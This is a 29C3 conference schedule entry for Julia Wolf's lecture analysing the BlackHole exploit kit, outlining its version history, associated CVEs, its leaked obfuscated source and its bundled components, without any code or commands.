29C3 - Version 1.9

F/a{hr-p).l//a,n
2.9/C-3

Speakers
Julia Wolf
Schedule
Day Day 3 - 2012-12-29
Room Saal 1
Start time 14:00
Duration 01:00
Info
ID 5205
Event type Lecture
Language used for presentation English
Feedback

Analytical Summary of the BlackHole Exploit Kit

Almost Everything You Ever Wanted To Know About The BlackHole Exploit Kit

There are hundreds, if not thousands, of news articles and blog posts about the BlackHole Exploit Kit. Usually, each story covers only a very narrow part of the subject matter. This talk will summarize the history of the BlackHole Exploit Kit into one easy to follow story. There will be diagrams and flow-charts for explaining code, rather than a giant blob of illegible Javascript, PHP, or x86 Assembly.

A. What a browser exploit kit is, and what it isn't

  1. It only does exploits
  2. Directing victims to the exploits is out of scope
  3. Usually done with spam or iframe injections
  4. The actual malware installed is out of scope too
  5. Where is exploit kit is hosted, is also quite variable

B. Timeline

  1. Version 1.0.0 - September 2010 i. It's not that different from other exploit kits
  2. Version 1.0.1
  3. Version 1.0.2 - November 2010 i. Changelog ii. Leaked in May 2011
  4. Version 1.1.0 - December 2010 i. Changelog
  5. Version 1.2.0 - August 2011 i. Changelog
  6. Version 1.2.1 - December 2011
  7. Version 1.2.2 i. Cryptome "Virus"
  8. Version 1.2.3 - March 2012
  9. Version 1.2.4 - June 2012 i. CVE-2012-1723 ii. CVE-2011-2110
  10. Version 1.2.5 - July 2012 i. CVE-2012-1889 ii. A single IFRAME injection campaign uses a temporal 'Domain Generation Algorithm'
  11. August 2012 i. CVE-2012-4681
  12. Version 2.0.0 - September 2012 i. Changelog ii. The official announcement isn't entirely true.

C. The "Free Version"

  1. Pulled from a system with C99 Shell
  2. IonCube "copy protection"
  3. How to break IonCube obfuscation
  4. Analysis of PHP Source Code

D. Open Source Code in use

  1. PluginDetect
  2. MaxMind GeoIP
  3. etc.

E. The Exploits

  1. CVE-2010-0188
  2. etc. etc. etc. as time allows X. There is almost no change in the expliots themselves from one version of the exploit kit to the next. Y. Currious clues about the possible authorship of some exploits